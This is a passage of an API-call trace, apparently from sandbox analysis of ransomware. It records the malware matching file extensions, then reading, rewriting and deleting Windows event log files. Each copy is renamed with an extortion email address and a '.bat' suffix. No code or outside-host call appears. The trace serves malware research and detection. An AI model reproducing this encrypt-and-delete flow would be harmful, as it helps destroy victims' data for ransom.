4 [0068.502] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0068.502] lstrcmpiW (lpString1=".evtx", lpString2=".bat") returned 1 [0068.502] lstrlenW (lpString="Microsoft-Windows-SMBServer%4Operational.evtx") returned 45 [0068.502] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0068.503] GetFileSizeEx (in: hFile=0x39c, lpFileSize=0x30cff14 | out: lpFileSize=0x30cff14*=69632) returned 1 [0068.503] CloseHandle (hObject=0x39c) returned 1 [0068.503] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4operational.evtx")) returned 0x20 [0068.503] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-smbserver%4operational.evtx.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0068.503] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0068.503] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0068.503] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0068.503] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-smbserver%4operational.evtx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0068.503] GetLastError () returned 0x0 [0068.504] ReadFile (in: hFile=0x39c, lpBuffer=0x3e08020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x30cfecc, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesRead=0x30cfecc*=0x11000, lpOverlapped=0x0) returned 1 [0068.506] WriteFile (in: hFile=0x37c, lpBuffer=0x3e08020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x30cfc94, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesWritten=0x30cfc94*=0x11010, lpOverlapped=0x0) returned 1 [0068.507] ReadFile (in: hFile=0x39c, lpBuffer=0x3e08020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x30cfecc, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesRead=0x30cfecc*=0x0, lpOverlapped=0x0) returned 1 [0068.507] WriteFile (in: hFile=0x37c, lpBuffer=0x3e08020*, nNumberOfBytesToWrite=0x12e, lpNumberOfBytesWritten=0x30cfc94, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesWritten=0x30cfc94*=0x12e, lpOverlapped=0x0) returned 1 [0068.507] SetEndOfFile (hFile=0x37c) returned 1 [0068.508] CloseHandle (hObject=0x37c) returned 1 [0068.508] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0068.508] SetEndOfFile (hFile=0x39c) returned 1 [0068.509] CloseHandle (hObject=0x39c) returned 1 [0068.509] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0068.509] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4operational.evtx")) returned 1 [0068.509] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx") returned 53 [0068.509] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx") returned 53 [0068.509] lstrlenW (lpString=".doc") returned 4 [0068.509] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0068.509] lstrlenW (lpString=".docx") returned 5 [0068.509] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0068.509] lstrlenW (lpString=".pdf") returned 4 [0068.509] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0068.509] lstrlenW (lpString=".xls") returned 4 [0068.509] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0068.509] lstrlenW (lpString=".xlsx") returned 5 [0068.509] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0068.510] lstrlenW (lpString=".ppt") returned 4 [0068.510] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0068.510] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx") returned 53 [0068.510] lstrlenW (lpString=".zip") returned 4 [0068.510] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0068.510] lstrlenW (lpString=".rar") returned 4 [0068.510] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0068.510] lstrlenW (lpString=".bz2") returned 4 [0068.510] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0068.510] lstrlenW (lpString=".7z") returned 3 [0068.510] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0068.510] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx") returned 53 [0068.510] lstrlenW (lpString=".dbf") returned 4 [0068.510] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0068.510] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx") returned 53 [0068.510] lstrlenW (lpString=".1cd") returned 4 [0068.510] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0068.510] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx") returned 53 [0068.510] lstrlenW (lpString=".jpg") returned 4 [0068.510] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0068.510] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx") returned 53 [0068.510] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx") returned 53 [0068.510] lstrlenW (lpString=".doc") returned 4 [0068.510] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0068.510] lstrlenW (lpString=".docx") returned 5 [0068.510] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0068.510] lstrlenW (lpString=".pdf") returned 4 [0068.510] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0068.510] lstrlenW (lpString=".xls") returned 4 [0068.510] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0068.510] lstrlenW (lpString=".xlsx") returned 5 [0068.510] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0068.510] lstrlenW (lpString=".ppt") returned 4 [0068.510] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0068.510] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx") returned 53 [0068.510] lstrlenW (lpString=".zip") returned 4 [0068.511] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0068.511] lstrlenW (lpString=".rar") returned 4 [0068.511] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0068.511] lstrlenW (lpString=".bz2") returned 4 [0068.511] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0068.511] lstrlenW (lpString=".7z") returned 3 [0068.511] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0068.511] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx") returned 53 [0068.511] lstrlenW (lpString=".dbf") returned 4 [0068.511] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0068.511] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx") returned 53 [0068.511] lstrlenW (lpString=".1cd") returned 4 [0068.511] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0068.511] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx") returned 53 [0068.511] lstrlenW (lpString=".jpg") returned 4 [0068.511] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0068.511] lstrcmpiW (lpString1=".evtx", lpString2=".bat") returned 1 [0068.511] lstrlenW (lpString="Microsoft-Windows-SMBServer%4Security.evtx") returned 42 [0068.511] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4security.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0068.512] GetFileSizeEx (in: hFile=0x39c, lpFileSize=0x30cff14 | out: lpFileSize=0x30cff14*=69632) returned 1 [0068.512] CloseHandle (hObject=0x39c) returned 1 [0068.512] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4security.evtx")) returned 0x20 [0068.512] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-smbserver%4security.evtx.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0068.768] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4security.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0068.768] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0068.768] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0068.768] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-smbserver%4security.evtx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0068.769] GetLastError () returned 0x0 [0068.769] ReadFile (in: hFile=0x2c8, lpBuffer=0x3e08020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x30cfecc, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesRead=0x30cfecc*=0x11000, lpOverlapped=0x0) returned 1 [0068.771] WriteFile (in: hFile=0x354, lpBuffer=0x3e08020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x30cfc94, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesWritten=0x30cfc94*=0x11010, lpOverlapped=0x0) returned 1 [0068.773] ReadFile (in: hFile=0x2c8, lpBuffer=0x3e08020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x30cfecc, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesRead=0x30cfecc*=0x0, lpOverlapped=0x0) returned 1 [0068.773] WriteFile (in: hFile=0x354, lpBuffer=0x3e08020*, nNumberOfBytesToWrite=0x128, lpNumberOfBytesWritten=0x30cfc94, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesWritten=0x30cfc94*=0x128, lpOverlapped=0x0) returned 1 [0068.773] SetEndOfFile (hFile=0x354) returned 1 [0068.773] CloseHandle (hObject=0x354) returned 1 [0068.773] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0068.774] SetEndOfFile (hFile=0x2c8) returned 1 [0068.775] CloseHandle (hObject=0x2c8) returned 1 [0068.775] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0068.775] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4security.evtx")) returned 1 [0068.775] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx") returned 50 [0068.775] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx") returned 50 [0068.775] lstrlenW (lpString=".doc") returned 4 [0068.775] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0068.775] lstrlenW (lpString=".docx") returned 5 [0068.775] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0068.775] lstrlenW (lpString=".pdf") returned 4 [0068.775] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0068.775] lstrlenW (lpString=".xls") returned 4 [0068.775] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0068.775] lstrlenW (lpString=".xlsx") returned 5 [0068.775] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0068.775] lstrlenW (lpString=".ppt") returned 4 [0068.775] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0068.775] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx") returned 50 [0068.775] lstrlenW (lpString=".zip") returned 4 [0068.775] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0068.776] lstrlenW (lpString=".rar") returned 4 [0068.776] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0068.776] lstrlenW (lpString=".bz2") returned 4 [0068.776] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0068.776] lstrlenW (lpString=".7z") returned 3 [0068.776] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0068.776] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx") returned 50 [0068.776] lstrlenW (lpString=".dbf") returned 4 [0068.776] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0068.776] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx") returned 50 [0068.776] lstrlenW (lpString=".1cd") returned 4 [0068.776] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0068.776] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx") returned 50 [0068.776] lstrlenW (lpString=".jpg") returned 4 [0068.776] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0068.776] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx") returned 50 [0068.776] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx") returned 50 [0068.776] lstrlenW (lpString=".doc") returned 4 [0068.776] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0068.776] lstrlenW (lpString=".docx") returned 5 [0068.776] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0068.776] lstrlenW (lpString=".pdf") returned 4 [0068.776] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0068.776] lstrlenW (lpString=".xls") returned 4 [0068.776] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0068.776] lstrlenW (lpString=".xlsx") returned 5 [0068.776] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0068.776] lstrlenW (lpString=".ppt") returned 4 [0068.776] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0068.776] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx") returned 50 [0068.776] lstrlenW (lpString=".zip") returned 4 [0068.776] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0068.776] lstrlenW (lpString=".rar") returned 4 [0068.776] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0068.776] lstrlenW (lpString=".bz2") returned 4 [0068.776] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0068.777] lstrlenW (lpString=".7z") returned 3 [0068.777] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0068.777] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx") returned 50 [0068.777] lstrlenW (lpString=".dbf") returned 4 [0068.777] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0068.777] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx") returned 50 [0068.777] lstrlenW (lpString=".1cd") returned 4 [0068.777] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0068.777] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx") returned 50 [0068.777] lstrlenW (lpString=".jpg") returned 4 [0068.777] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0068.777] lstrcmpiW (lpString1=".evtx", lpString2=".bat") returned 1 [0068.777] lstrlenW (lpString="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx") returned 70 [0068.777] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-remoteconnectionmanager%4admin.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0068.778] GetFileSizeEx (in: hFile=0x2c8, lpFileSize=0x30cff14 | out: lpFileSize=0x30cff14*=69632) returned 1 [0068.778] CloseHandle (hObject=0x2c8) returned 1 [0068.778] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-remoteconnectionmanager%4admin.evtx")) returned 0x20 [0068.778] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-terminalservices-remoteconnectionmanager%4admin.evtx.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0068.778] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-remoteconnectionmanager%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0068.778] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0068.778] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0068.778] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-terminalservices-remoteconnectionmanager%4admin.evtx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0068.779] GetLastError () returned 0x0 [0068.779] ReadFile (in: hFile=0x2c8, lpBuffer=0x3e08020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x30cfecc, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesRead=0x30cfecc*=0x11000, lpOverlapped=0x0) returned 1 [0068.781] WriteFile (in: hFile=0x354, lpBuffer=0x3e08020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x30cfc94, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesWritten=0x30cfc94*=0x11010, lpOverlapped=0x0) returned 1 [0068.783] ReadFile (in: hFile=0x2c8, lpBuffer=0x3e08020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x30cfecc, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesRead=0x30cfecc*=0x0, lpOverlapped=0x0) returned 1 [0068.783] WriteFile (in: hFile=0x354, lpBuffer=0x3e08020*, nNumberOfBytesToWrite=0x160, lpNumberOfBytesWritten=0x30cfc94, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesWritten=0x30cfc94*=0x160, lpOverlapped=0x0) returned 1 [0068.783] SetEndOfFile (hFile=0x354) returned 1 [0068.783] CloseHandle (hObject=0x354) returned 1 [0068.783] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0068.783] SetEndOfFile (hFile=0x2c8) returned 1 [0068.784] CloseHandle (hObject=0x2c8) returned 1 [0068.784] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0068.784] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-remoteconnectionmanager%4admin.evtx")) returned 1 [0068.785] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx") returned 78 [0068.785] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx") returned 78 [0068.785] lstrlenW (lpString=".doc") returned 4 [0068.785] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0068.785] lstrlenW (lpString=".docx") returned 5 [0068.785] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0068.785] lstrlenW (lpString=".pdf") returned 4 [0068.785] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0068.785] lstrlenW (lpString=".xls") returned 4 [0068.785] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0068.785] lstrlenW (lpString=".xlsx") returned 5 [0068.785] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0068.785] lstrlenW (lpString=".ppt") returned 4 [0068.785] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0068.785] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx") returned 78 [0068.785] lstrlenW (lpString=".zip") returned 4 [0068.785] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0068.785] lstrlenW (lpString=".rar") returned 4 [0068.785] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0068.785] lstrlenW (lpString=".bz2") returned 4 [0068.785] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0068.785] lstrlenW (lpString=".7z") returned 3 [0068.785] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0068.785] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx") returned 78 [0068.785] lstrlenW (lpString=".dbf") returned 4 [0068.785] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0068.785] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx") returned 78 [0068.785] lstrlenW (lpString=".1cd") returned 4 [0068.785] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0068.785] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx") returned 78 [0068.785] lstrlenW (lpString=".jpg") returned 4 [0068.785] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0068.785] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx") returned 78 [0068.785] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx") returned 78 [0068.786] lstrlenW (lpString=".doc") returned 4 [0068.786] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0068.786] lstrlenW (lpString=".docx") returned 5 [0068.786] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0068.786] lstrlenW (lpString=".pdf") returned 4 [0068.786] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0068.786] lstrlenW (lpString=".xls") returned 4 [0068.786] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0068.786] lstrlenW (lpString=".xlsx") returned 5 [0068.786] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0068.786] lstrlenW (lpString=".ppt") returned 4 [0068.786] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0068.786] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx") returned 78 [0068.786] lstrlenW (lpString=".zip") returned 4 [0068.786] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0068.786] lstrlenW (lpString=".rar") returned 4 [0068.786] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0068.786] lstrlenW (lpString=".bz2") returned 4 [0068.786] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0068.786] lstrlenW (lpString=".7z") returned 3 [0068.786] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0068.786] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx") returned 78 [0068.786] lstrlenW (lpString=".dbf") returned 4 [0068.786] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0068.786] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx") returned 78 [0068.786] lstrlenW (lpString=".1cd") returned 4 [0068.786] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0068.786] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx") returned 78 [0068.786] lstrlenW (lpString=".jpg") returned 4 [0068.786] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0068.786] lstrcmpiW (lpString1=".evtx", lpString2=".bat") returned 1 [0068.786] lstrlenW (lpString="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx") returned 76 [0068.787] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-remoteconnectionmanager%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0068.787] GetFileSizeEx (in: hFile=0x2c8, lpFileSize=0x30cff14 | out: lpFileSize=0x30cff14*=69632) returned 1 [0068.787] CloseHandle (hObject=0x2c8) returned 1 [0068.788] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-remoteconnectionmanager%4operational.evtx")) returned 0x20 [0068.788] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-terminalservices-remoteconnectionmanager%4operational.evtx.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0068.788] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-remoteconnectionmanager%4operational.evtx"), dwDesiredAccess=0xc0000000, 